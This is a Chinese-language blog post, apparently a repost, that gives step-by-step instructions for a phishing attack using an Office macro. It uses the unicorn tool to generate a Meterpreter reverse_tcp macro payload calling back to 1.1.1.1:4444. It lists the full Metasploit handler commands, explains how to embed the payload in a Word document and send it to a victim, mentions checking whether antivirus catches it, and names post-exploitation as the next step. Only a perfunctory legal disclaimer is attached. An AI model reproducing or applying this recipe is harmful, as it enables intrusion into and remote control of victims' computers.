• Windows宏病毒利用


    背景:

    最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。

    常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。

    那么今天主要利用Windows office 宏进行远程攻击。

    环境:

    kail Linux 2018 xface

    Windows 10 home  office 2016

    直接上操作:

    kail linux 

    # git clone https://github.com/trustedsec/unicorn.git

    此工具使用具体看帮助信息,这里不多说明,也可以去Git上查看

    生成payload:

    # python unicorn.py windows/meterpreter/reverse_tcp 1.1.1.1 4444 macro

    会生成:

    powershell_attack.txt #office宏payload

    unicorn.rc #msf使用

    两个文件

    启动msfconsole

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 1.1.1.1
    set LPORT 4444
    set ExitOnSession false
    set AutoVerifySession false
    set AutoSystemInfo false
    set AutoLoadStdapi false
    exploit -j

    靶机Windows10 主机上生成带有宏病毒的office Word文档

    记得打开开发者选项,输入正文内容

    点击宏,输入宏名称,然后点击新建

    这里将生成的payload 复制进去

    然后点击保存,导出文档为97-2003 文档格式

    将文档发给受害者,打开文档就直接上线。

    okay msf这边已经上线

    在这里可能有人可能会问题,那报毒怎么办,那么我杀毒检测看看,看看稳不稳:

    后面就是进程迁移,后持续渗透,内网深入渗透了。。。。

    请勿使用非法用途,否则后果自负。。。。。

    备注:生成的payload需要修改下,否则会导致不运行或者运行完成后退出。。。。

  • 相关阅读:
    Redis 客户端连接
    Redis 性能测试
    Redis 安全
    Redis 数据备份与恢复
    Redis 数据类型
    Redis 配置
    Redis 安装
    Redis 简介
    Redis教程
    如何修改Oracle Enterprise Linux时区?
  • 原文地址:https://www.cnblogs.com/hack404/p/11876059.html
Copyright © 2020-2023  润新知